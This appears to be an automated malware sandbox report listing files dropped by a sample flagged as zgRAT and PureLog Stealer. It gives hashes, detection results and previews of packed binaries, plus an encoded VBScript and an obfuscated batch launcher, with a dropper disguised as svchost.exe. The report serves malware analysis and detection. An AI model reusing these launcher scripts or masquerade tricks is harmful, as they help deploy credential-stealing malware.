                                                                                                  SHA1:5F1AE1AB1A3C4C023EA8138D4B09CBC1CD8E8F9E
                                                                                                  SHA-256:EFA27CD726DBF3BF2448476A993DC0D5FFB0264032BF83A72295AB3FC5BCD983
                                                                                                  SHA-512:B20195930967B4DC9F60C15D9CEAE4D577B00095F07BD93AA4F292B94A2E5601D605659E95D5168C1C2D85DC87A54D27775F8F20EBCACF56904E4AA30F1AFFBA
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4...4...4...A...4...[n..4...A...4...A...4...A...4...L...4...F...4...4...5...A...4...A...4...Al..4...A...4..Rich.4..........................PE..d...\(.b.........." .............P/..XE..`/..................................PF...........`...........................................E......yE.d....pE......PB.h............@F......................................dE.8...........................................UPX0.....P/.............................UPX1.........`/.....................@....rsrc........pE.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23536
                                                                                                  Entropy (8bit):7.33649667835335
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:NiRf5SV1a/dSyQMZa7gJXUOjMIv7Gi64IYiSy1pCQaKEJ94i/8E9VFShf:NGxSVQFS0pEOgIv7GimYiSyvQJ9eEwf
                                                                                                  MD5:3CDFDB7D3ADF9589910C3DFBE55065C9
                                                                                                  SHA1:860EF30A8BC5F28AE9C81706A667F542D527D822
                                                                                                  SHA-256:92906737EFF7FF33B9E2A72D2A86E4BD80A35018C8E40BB79433A8EA8ECE3932
                                                                                                  SHA-512:1FE2C918E9CE524B855D7F38D4C69563F8B8C44291EEA1DC98F04E5EBDC39C8F2D658A716429051FB91FED0B912520929A0B980C4F5B4ECB3DE1C4EB83749A45
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......fa!.".O.".O.".O.+x.. .O.puN. .O.puJ.).O.puK.*.O.puL.&.O..uN. .O.".N.b.O..rN.'.O..uB.#.O..uO.#.O..u..#.O..uM.#.O.Rich".O.................PE..d....(.b.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):293360
                                                                                                  Entropy (8bit):7.986777578304979
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:zxrLHdbWP4Ue5eV0KpvRWXH4mxy2Vc2X8r1kNgi7XG09JE1j4sbV9n:zNNWP4H543vRWomxdXgku8X9U1j4sbrn
                                                                                                  MD5:2218B2730B625B1AEEE6A67095C101A4
                                                                                                  SHA1:AA7F032B9C8B40E5ECF2A0F59FA5AE3F48EFF90A
                                                                                                  SHA-256:5E9ADD4DD806C2DE4D694B9BB038A6716BADB7D5F912884D80D593592BCDB8CA
                                                                                                  SHA-512:77AA10AE645C0BA24E31DCAB4726D8FB7AA3CB9708C7C85499E7D82CE46609D43E5DC74DA7CD32C170C7DDF50C8DB8945BAF3452421316C4A46888D745DE8DA0
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.OJ).OJ).OJ).7.).OJ).:K(.OJ).:O(.OJ).:N(.OJ).:I(.OJ)i:K(.OJ){=K(.OJ).OK).OJ)i:G(.OJ)i:J(.OJ)i:.).OJ)i:H(.OJ)Rich.OJ)........PE..d....(.b.........." .....P...........U... ................................................`..........................................{..X....y.......p.......................{.......................................a..8...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (328), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):328
                                                                                                  Entropy (8bit):5.874891872468781
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:dtflymqdU0PXLU/OWz8blJ1ZrnzoWhgrwgQoT/xUUQMEKcz3mgVkk:n9yV6ehWz8bxZrnUr8Kx+7mgVkk
                                                                                                  MD5:0659D3499B16A12FFCF1A5E550F8AC33
                                                                                                  SHA1:AC1E646A6DD5854445D68BA336BF9C70B63680C8
                                                                                                  SHA-256:A61C3D6B7DC17C60C47D064EC1157EFDE41AC6BF9DF23D365ABAF6939CD4E082
                                                                                                  SHA-512:10EF5E6652673B92302CF0631E87DED4B9E409E4E96205CE0FCC0E1D3FBE4F026C0C1E32224F113EADD840119C6BACE5F8146381313358C412D74E3E5F9B95C6
                                                                                                  Malicious:false
                                                                                                  Preview:H4sIAAAAAAAEAG2PzU7DMBCEXyXqGfWCuHBLE6pKFCkihUqwHIyzSQ22J/JP3PD0uBWHCrjt7qy+mXldVLdEjcPghCnWSrMnemhXUekuD0o6ePSBaK9sh+SLPdxnr5GKNaLtRFCwRNP18oaoE34DH5Z85MXVmfvk2WVeE9+1kkQ1ZDRsw8liLholQ3Qnv4T4PO5easzNXK7u7zYXiEeWmNjNRCNSph1Y63/lpKzGAHsh/q6FL6W1yKvjHsccOJm/YT9gT8/lONYiCKItpNBEOzYjkfHlkAu0YmJvYFWAI6oOQtkKpmWXo/ycz+C3b4CMeGFfAQAA
                                                                                                  Process:C:\ProgramData\svchost.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3720704
                                                                                                  Entropy (8bit):7.733352681119499
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                  Process:C:\ProgramData\svchost.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):103
                                                                                                  Entropy (8bit):5.031377595969092
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:svwBUcsAoQEHTDWC26AHMKvMSQL4cSv:sYBfvQT4bMKvMSQkfv
                                                                                                  MD5:77218AE27E9AD896918D9A081C61B1BE
                                                                                                  SHA1:3C8EBAA8FA858B82E513CCF482E11172B0F52CE0
                                                                                                  SHA-256:E09540A47F3647A9FDF9673281E2664441BBAEE8D3236D22B1875B9D23ABACAB
                                                                                                  SHA-512:6A16B367A762132172830FD81C41C58AC49DE788EED93D4C5526F8F0E6859703B336A137FD8D4FE7088B4110D72E5F4767B6462BC4651769924B67305719F30A
                                                                                                  Malicious:true
                                                                                                  Preview:%lJWFircOu%%nvRebZgpg%..%kImkMpPKuFLx%"%Temp%\msAgentSavesmonitor/ChainComServermonitor.exe"%EaZpTohGW%
                                                                                                  Process:C:\ProgramData\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):217
                                                                                                  Entropy (8bit):5.712224367043722
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:GmvwqK+NkLzWbHnPv7qK+NkLzWHFojm8eGxjs:G1MCzWLnP/MCzWlStjs
                                                                                                  MD5:D6DA6166258E23C9170EE2A4FF73C725
                                                                                                  SHA1:C3C9D6925553E266FE6F20387FEEE665CE3E4BA9
                                                                                                  SHA-256:78EE67A8AE359F697979F4CD3C7228D3235C32D3B611303E070B71414591BA1E
                                                                                                  SHA-512:37A5A18ACBB56E5458BAEBB12A4D3B3229B218EB606BE3535D1C30E8E0D4FA969543889C587078456321209FE4503688432F45FF35A7AF598B770393E7AE3B05
                                                                                                  Malicious:true
                                                                                                  Preview:#@~^wAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.k4?4+sscIEU~r]P+s2uzhkbT+xD?m-+k:GxbYG.JzWVLX!V/bTfL+2}&dL//c4CYrSPZ~~WmV/n8j0AAA==^#~@.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):426
                                                                                                  Entropy (8bit):4.987455236739546
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL62rV1XmrViFkD:JNVQIbSfhV7TiFkMSfhW2rVM4FkD
                                                                                                  MD5:C6EA1CDC393B6C8F4060A4831F67274A
                                                                                                  SHA1:49F82605781521D789FD1B5A5147EBBC8BDFF624
                                                                                                  SHA-256:B599438C72712DE8C2ADDC2EA38393D68F2A28537290D3C253CCE6B767A4AA91
                                                                                                  SHA-512:9FD80E911A585FE97B2EA6084379748AE639F3C13A991420942C921CC76E4FAD1E08410EEF36AD163395C764D4A3FEC2C3FD2C4FA1DA1A779DEDAA7B36FF349E
                                                                                                  Malicious:false
